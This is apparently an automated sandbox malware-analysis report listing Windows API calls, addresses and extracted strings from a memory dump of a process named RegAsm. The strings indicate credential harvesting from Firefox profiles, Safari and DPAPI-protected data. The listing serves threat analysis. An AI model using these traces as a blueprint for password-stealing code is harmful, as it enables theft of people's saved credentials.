                                                                                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1213725291-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                                                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                      • API String ID: 2360000266-2664311388
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                                                        • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                        • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                        • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                        • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                        • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                        • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                        • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                        • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                        • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Version
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 829165378-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                      • API String ID: 1607361635-601624466
                                                                                                                                                                                                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
